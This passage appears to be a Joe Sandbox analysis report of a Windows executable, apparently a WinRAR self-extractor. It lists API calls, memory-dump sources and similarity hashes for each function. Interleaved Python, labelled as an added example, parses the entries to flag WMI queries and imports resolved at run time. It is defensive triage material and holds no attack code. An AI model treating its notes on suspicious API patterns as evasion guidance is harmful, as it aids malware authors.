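WMI_NAMESPACE = "ROOT\\CIMV2"


@dataclass
class ApiCall:
    name: str
    module: str
    addr: str            # call site inside the analysed image
    args: List[str]      # stack-resolved arguments, '?' where unknown
    caller: Optional[str] = None  # set for "Part of subcall function" lines


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    api_id: str = ""
    strings: List[str] = field(default_factory=list)
    opcode_id: str = ""


def parse_records(text: str) -> List[FunctionRecord]:
    """Split the report text into records; lines outside a record are ignored."""
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":            # assumption: each record opens with this header
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or not line.startswith("•"):
            continue
        body = line.lstrip("•").strip()
        m = FIELD_RE.match(body)
        if m:
            key, val = m.group("key"), m.group("val").strip()
            if key == "API ID":
                cur.api_id = val
            elif key == "String ID":  # the report joins referenced strings with '$'
                cur.strings = val.split("$") if val else []
            elif key == "Opcode ID":
                cur.opcode_id = val
            continue
        m = API_RE.match(body)
        if m:
            args = m.group("args")
            cur.calls.append(ApiCall(m.group("name"), m.group("module"), m.group("addr"),
                                     args.split(",") if args is not None else [],
                                     m.group("caller")))
    return records


def mentions(rec: FunctionRecord, needle: str) -> bool:
    """True if the literal is among the record's strings or any resolved argument.
    Stack-resolved arguments leak the namespace into helpers that never hold the
    literal themselves (the GetLastError call above is one such case)."""
    return needle in rec.strings or any(needle in a for c in rec.calls for a in c.args)


def wmi_os_queries(records: List[FunctionRecord]) -> List[FunctionRecord]:
    """Records that pair a WMI namespace with a WQL SELECT: the OS-version lookup
    that sits next to the 'Windows 10' literal in this sample."""
    return [r for r in records
            if mentions(r, WMI_NAMESPACE)
            and any(s.upper().startswith("SELECT ") for s in r.strings)]


def modules_used(rec: FunctionRecord) -> List[str]:
    return sorted({c.module for c in rec.calls})


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        tag = "WMI-QUERY " if rec in wmi_os_queries([rec]) else ""
        print(f"{tag}{rec.opcode_id[:16]} modules={modules_used(rec)} strings={rec.strings}")
```

Running it over the full function dump of this report (rather than the trimmed sample) needs no changes beyond feeding in the page text; the Memory Dump Source and Snapshot File lines fall through both patterns and are skipped.
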
APIs
• __EH_prolog.LIBCMT ref: 00A2A5EE
• GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00A2A611
• GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00A2A630
  • Part of subcall function 00A2D6A7: _wcslen.LIBCMT ref: 00A2D6AF
  • Part of subcall function 00A33316: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00013316,00A2D523,00000000,.exe,?,?,00000800,?,?,?,00A39E5C), ref: 00A3332C
• _swprintf.LIBCMT ref: 00A2A6CC
  • Part of subcall function 00A24A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00A24A33
• MoveFileW.KERNEL32(?,?), ref: 00A2A73B
• MoveFileW.KERNEL32(?,?), ref: 00A2A77B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
• String ID: rtmp%d
• API String ID: 3726343395-3303766350
• Opcode ID: 803b9c6ec0496532256ca9133fb3c38ef424ed138ecdbb6bc63f5682e34befc6
                                                                                              • Instruction ID: 2c4545aa105b7c4683bcd5eee37923f860e13c88f76dcbf8dee8aba048c916a5
                                                                                              • Opcode Fuzzy Hash: 803b9c6ec0496532256ca9133fb3c38ef424ed138ecdbb6bc63f5682e34befc6
                                                                                              • Instruction Fuzzy Hash: 4F415B729102396BCF20ABA8ED84EEF737CBF64340F0404B5B545E3046EB348A859F65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

APIs
• __aulldiv.LIBCMT ref: 00A3254E
  • Part of subcall function 00A2C619: GetVersionExW.KERNEL32(?), ref: 00A2C63E
• FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,00000001), ref: 00A32571
• FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,00000001), ref: 00A32583
• SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00A32594
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00A325A4
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00A325B4
• FileTimeToSystemTime.KERNEL32(?,?,?), ref: 00A325EF
• __aullrem.LIBCMT ref: 00A32699
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
• String ID:
• API String ID: 1247370737-0
• Opcode ID: c10d744862f642fdb4aac9d34dbce341c1b9aa3e28bd5a42c3d556b932620b05
• Instruction ID: a7b4c9b5e42422a2ead6294b63c79d681374b9db48bb09519694898799664673
• Opcode Fuzzy Hash: c10d744862f642fdb4aac9d34dbce341c1b9aa3e28bd5a42c3d556b932620b05
• Instruction Fuzzy Hash: 72411AB25483059FC714DF65D884A6BBBF9FF88315F008A2EF59AC2210E734E549CB61
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: _wcslen
• String ID: </p>$</style>$<br>$<style>$>
• API String ID: 176396367-3568243669
• Opcode ID: 77688068a4b0f97e87d45cc52ac2db09c0140374ca22a8f4772c3beda7f82dd5
• Instruction ID: 50fed01cec0cad3b5314b32f9fb47c0be67209224143525f32528b30d31dc9ac
• Opcode Fuzzy Hash: 77688068a4b0f97e87d45cc52ac2db09c0140374ca22a8f4772c3beda7f82dd5
• Instruction Fuzzy Hash: CD51E56674037395DB305B249822B7673E0EFB4792F68482BFDC19B5C0FB658D818262
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00A50FC2,00000000,00000000,00000000,00000000,00000000,?), ref: 00A5088F
• __fassign.LIBCMT ref: 00A5090A
• __fassign.LIBCMT ref: 00A50925
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00A5094B
• WriteFile.KERNEL32(?,00000000,00000000,00A50FC2,00000000,?,?,?,?,?,?,?,?,?,00A50FC2,00000000), ref: 00A5096A
• WriteFile.KERNEL32(?,00000000,00000001,00A50FC2,00000000,?,?,?,?,?,?,?,?,?,00A50FC2,00000000), ref: 00A509A3
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
• Opcode ID: 84f1d5b41765b1871ec68ce6c161a454380adfed3c1c1f538c3c7303ecc6575b
• Instruction ID: 7d26853d382aa82a813cc56c50b8270d9ffee377603f6ce547e36ae91485c66e
• Opcode Fuzzy Hash: 84f1d5b41765b1871ec68ce6c161a454380adfed3c1c1f538c3c7303ecc6575b
• Instruction Fuzzy Hash: 9C517E71A00249AFDB10CFA8D885EEEBBB8FF49311F14415AE955E7292E7309945CB60
Uniqueness

Uniqueness Score: -1.00%

APIs
• _ValidateLocalCookies.LIBCMT ref: 00A43AC7
• ___except_validate_context_record.LIBVCRUNTIME ref: 00A43ACF
• _ValidateLocalCookies.LIBCMT ref: 00A43B58
• __IsNonwritableInCurrentImage.LIBCMT ref: 00A43B83
• _ValidateLocalCookies.LIBCMT ref: 00A43BD8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 7ba8f9a6711d1900c242b86cd72b74ca73f9dac542ede16494a2d0c0ddab54ef
• Instruction ID: 36c5bc185985f31d66c4f8b0a70a692e4cc4e4ba0f52d1167bd87ae584bfea7e
• Opcode Fuzzy Hash: 7ba8f9a6711d1900c242b86cd72b74ca73f9dac542ede16494a2d0c0ddab54ef
• Instruction Fuzzy Hash: B441D379A01218AFCF10DF69C885B9EBBB4FF85324F148165E8149B392C771AB06CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• ShowWindow.USER32(?,00000000), ref: 00A3AF0E
• GetWindowRect.USER32(?,?), ref: 00A3AF64
• ShowWindow.USER32(?,00000005,00000000), ref: 00A3B001
• SetWindowTextW.USER32(?,00000000), ref: 00A3B009
• ShowWindow.USER32(00000000,00000005), ref: 00A3B01F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: Window$Show$RectText
• String ID: RarHtmlClassName
• API String ID: 3937224194-1658105358
• Opcode ID: 109bbb9c23b7bc429816bc17f7f1d542579174700d77b6688d2448a136e04ba8
• Instruction ID: 1742383f225826533b5b04df2405bcb45150b5cc5306972bdcda68f56b8e562d
• Opcode Fuzzy Hash: 109bbb9c23b7bc429816bc17f7f1d542579174700d77b6688d2448a136e04ba8
• Instruction Fuzzy Hash: BD41CF75804214AFCB21AFB0ED4DB6B7BA9EF48701F144659FD899A062DB70D805CB62
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: _wcslen
• String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
• API String ID: 176396367-3743748572
• Opcode ID: b539b7cdfcb77c18a12d3129e5ba3ea19c4b0dd32536211457352db098566bbf
• Instruction ID: 02fe5cf9f2a86877b8c05535fd7b714866016fbe5844ea21fcb86443ce8384b3
• Opcode Fuzzy Hash: b539b7cdfcb77c18a12d3129e5ba3ea19c4b0dd32536211457352db098566bbf
• Instruction Fuzzy Hash: 19315B77E44751A7D630AB54AD42B7A73E4EBA0760F20841FF8C657280FB64AD84C3A7
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00A4DA28: _free.LIBCMT ref: 00A4DA51
• _free.LIBCMT ref: 00A4DAB2
  • Part of subcall function 00A4A66A: RtlFreeHeap.NTDLL(00000000,00000000,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?), ref: 00A4A680
  • Part of subcall function 00A4A66A: GetLastError.KERNEL32(?,?,00A4DA56,?,00000000,?,00000000,?,00A4DA7D,?,00000007,?,?,00A4DE7A,?,?), ref: 00A4A692
• _free.LIBCMT ref: 00A4DABD
• _free.LIBCMT ref: 00A4DAC8
• _free.LIBCMT ref: 00A4DB1C
• _free.LIBCMT ref: 00A4DB27
• _free.LIBCMT ref: 00A4DB32
• _free.LIBCMT ref: 00A4DB3D
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
• Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
• Instruction ID: 73359e784e9075161e690b28c83d24a0d0a42eb578b6879e4d3bca34777a99ef
• Opcode Fuzzy Hash: ed90a822092467ab948ce4ab8a4e5ff1fef504289117e408d2aed02f462530fb
• Instruction Fuzzy Hash: A011E635984B04BAD530F7B1CD07FCBB7ECAFA0300F800C24B29E66152DA34B4114742
Uniqueness

Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00A3F7F5,00A3F758,00A3F9F9), ref: 00A3F791
                                                                                              • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00A3F7A7
                                                                                              • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00A3F7BC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                              • API String ID: 667068680-1718035505
                                                                                              • Opcode ID: aa333cc4c7af238820bc1f0adba6a6e567addf45234548d8f8612773de5b45fd
                                                                                              • Instruction ID: 08abf680f6bf393433ca34cab60a12d54fdb0d9b71075673671b57521087748d
                                                                                              • Opcode Fuzzy Hash: aa333cc4c7af238820bc1f0adba6a6e567addf45234548d8f8612773de5b45fd
                                                                                              • Instruction Fuzzy Hash: 0AF0F672F713226F9F609FF45CC456B62DCBA15756B20083BFA51D3244E620CC8697D0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
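
The per-function entries on this page are emitted as flat text: an `APIs` list of `Name.MODULE(args), ref: address` bullets (some attributed to a callee with `Part of subcall function`), then the memory-dump source and the similarity hashes. That shape is awkward to query by hand when the question is "which functions resolve imports at run time, and which names do they ask for?". The Python below is an added example and is not part of the Joe Sandbox report or of any Joe Security tooling: it parses those bullets into records and pulls out the names passed to GetProcAddress. For the entry above those are AcquireSRWLockExclusive and ReleaseSRWLockExclusive, consistent with the Visual C++ runtime's start-up thunks, which look up the SRW lock functions dynamically for older Windows versions; the same check becomes interesting when the resolved names are memory-protection or remote-thread APIs. The embedded sample text is copied from entries on this page and is labelled as such in the code; the regular expression is written against the line shapes seen here, and treating it as a description of the report format in general is an assumption.

```python
"""Parse the per-function 'APIs' bullets of a Joe Sandbox report into structured records.

Added example for triage of exported report text; not Joe Security code. The
regular expression is derived from the bullet shapes visible on this page and is
assumed (not verified) to hold for the format generally.
"""
import re
from dataclasses import dataclass
from typing import Optional

# Bullet shapes, taken verbatim from the report above:
#   • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00A3F7A7
#   • Part of subcall function 00A2C619: GetVersionExW.KERNEL32(?), ref: 00A2C63E
#   • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A43CA6
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<subcall>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX8 = re.compile(r"^[0-9A-F]{8}$")

# Constructed sample: three entries copied from the report on this page.
SAMPLE_REPORT = """\
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00A3F7F5,00A3F758,00A3F9F9), ref: 00A3F791
• GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00A3F7A7
• GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00A3F7BC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
APIs
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00A327F1
  • Part of subcall function 00A2C619: GetVersionExW.KERNEL32(?), ref: 00A2C63E
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A32815
• FileTimeToSystemTime.KERNEL32(?,?), ref: 00A3282F
APIs
  • Part of subcall function 00A31907: _wcslen.LIBCMT ref: 00A3190D
  • Part of subcall function 00A2CD5C: _wcsrchr.LIBVCRUNTIME ref: 00A2CD73
• _wcslen.LIBCMT ref: 00A2D5A4
• _wcslen.LIBCMT ref: 00A2D5EC
"""


@dataclass
class Call:
    api: str
    module: str
    args: list[str]
    ref: str                       # call-site address inside the dumped image
    subcall: Optional[str] = None  # callee address when the report attributes the call to a subcall


def parse_api_line(line: str) -> Optional[Call]:
    """Return a Call for one API bullet, or None for any other report line."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return Call(m.group("api"), m.group("module"), args, m.group("ref"), m.group("subcall"))


def parse_entries(report_text: str) -> list[list[Call]]:
    """Split on the 'APIs' headers; each returned list is one analysed function."""
    entries: list[list[Call]] = []
    current: Optional[list[Call]] = None
    for line in report_text.splitlines():
        if line.strip() == "APIs":
            current = []
            entries.append(current)
            continue
        call = parse_api_line(line)
        if call is not None and current is not None:
            current.append(call)
    return entries


def resolved_imports(calls: list[Call]) -> list[str]:
    """Names a function resolves at run time: GetProcAddress with a literal (non-hex, non-'?') name."""
    names = []
    for c in calls:
        if c.api == "GetProcAddress" and len(c.args) >= 2:
            name = c.args[1]
            if name != "?" and not HEX8.match(name):
                names.append(name)
    return names


def call_sequence(calls: list[Call], include_subcalls: bool = False) -> list[str]:
    """MODULE!Api sequence of one entry; subcall-attributed lines are dropped unless requested."""
    return [f"{c.module}!{c.api}" for c in calls if include_subcalls or c.subcall is None]


def entries_with_runtime_resolution(report_text: str) -> list[tuple[int, list[str]]]:
    """(entry index, resolved names) for every analysed function that resolves imports by name."""
    return [(i, names) for i, calls in enumerate(parse_entries(report_text))
            if (names := resolved_imports(calls))]


if __name__ == "__main__":
    for idx, names in entries_with_runtime_resolution(SAMPLE_REPORT):
        print(f"entry {idx} resolves at run time: {', '.join(names)}")
```

Run over a whole exported report, `entries_with_runtime_resolution` gives a short list to review first; the CRT's SRW-lock lookup above is expected noise, and anything resolving names outside that start-up pattern deserves a look at the call sequence of the same entry.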

                                                                                              APIs
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A327F1
                                                                                                • Part of subcall function 00A2C619: GetVersionExW.KERNEL32(?), ref: 00A2C63E
                                                                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A32815
                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A3282F
                                                                                              • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00A32842
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A32852
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A32862
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$File$System$Local$SpecificVersion
                                                                                              • String ID:
                                                                                              • API String ID: 2092733347-0
                                                                                              • Opcode ID: cc2776c60e44c517ad6e699a41e3947751e409a6b3728d6903abe382ae285977
                                                                                              • Instruction ID: 8c52020ecb2068105187f972a5df7f4d6d2baa2aa0cb2eabc898d966922aedc8
                                                                                              • Opcode Fuzzy Hash: cc2776c60e44c517ad6e699a41e3947751e409a6b3728d6903abe382ae285977
                                                                                              • Instruction Fuzzy Hash: 4631F775108316ABC704DFA8D88499BBBF8BF9C714F005A2EF999C3210E730D549CBA6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,?,00A43C81,00A43A3C,00A40BF4), ref: 00A43C98
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A43CA6
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A43CBF
                                                                                              • SetLastError.KERNEL32(00000000,00A43C81,00A43A3C,00A40BF4), ref: 00A43D11
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a20000_H9gMIu2HXi.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 6f7b4dc5c1f3f355d5a97681326b49311f94a44dd957c4e27116b64963ab62ed
                                                                                              • Instruction ID: 6678186b2a727fcdee30c8a5d04a7e91928d247693bd604b26325e69ca82d3c6
                                                                                              • Opcode Fuzzy Hash: 6f7b4dc5c1f3f355d5a97681326b49311f94a44dd957c4e27116b64963ab62ed
                                                                                              • Instruction Fuzzy Hash: F301F73F6197225EAE1427B8BDC6B6B2B64FBC5779F300629F610610E1EF915C429680
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(?,00A63070,00A45982,00A63070,?,?,00A45281,00000050,?,00A63070,00000200), ref: 00A4A519
                                                                                              • _free.LIBCMT ref: 00A4A54C
                                                                                              • _free.LIBCMT ref: 00A4A574
                                                                                              • SetLastError.KERNEL32(00000000,?,00A63070,00000200), ref: 00A4A581
                                                                                              • SetLastError.KERNEL32(00000000,?,00A63070,00000200), ref: 00A4A58D
                                                                                              • _abort.LIBCMT ref: 00A4A593
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1636616066.0000000000A21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A20000, based on PE: true
                                                                                               • Associated: 00000000.00000002.1636599322.0000000000A20000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636648853.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A60000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A67000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636665652.0000000000A84000.00000004.00000001.01000000.00000003.sdmp
                                                                                               • Associated: 00000000.00000002.1636720059.0000000000A85000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
